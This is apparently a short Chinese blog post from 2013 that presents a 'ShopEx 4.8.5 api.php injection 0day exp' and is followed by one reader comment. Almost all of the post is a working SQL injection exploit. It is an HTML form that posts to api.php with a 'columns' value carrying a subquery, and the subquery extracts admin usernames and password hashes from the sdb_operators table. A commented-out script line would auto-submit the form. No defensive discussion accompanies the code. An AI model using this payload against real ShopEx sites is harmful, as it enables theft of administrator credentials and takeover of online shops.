shopex 4.8.5 api.php注入漏洞0day exp

分类:安全 | 2013-08-10 | 撸过 179 次
2人扯谈
<form method='post' action='https://www.webshell.cc/api.php?act=search_dly_type&api_version=1.0'>

columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />

<input type='submit' value='submit' /><br />

</form>

<script>

//document.forms[0].submit()

</script>
本站内容均为原创,转载请务必保留署名与链接!
shopex 4.8.5 api.php注入漏洞0day exp:https://www.webshell.cc/4404.html

随机日志

  1. 看你的文章真蛋疼,适用什么版本也不说,可行性也没提,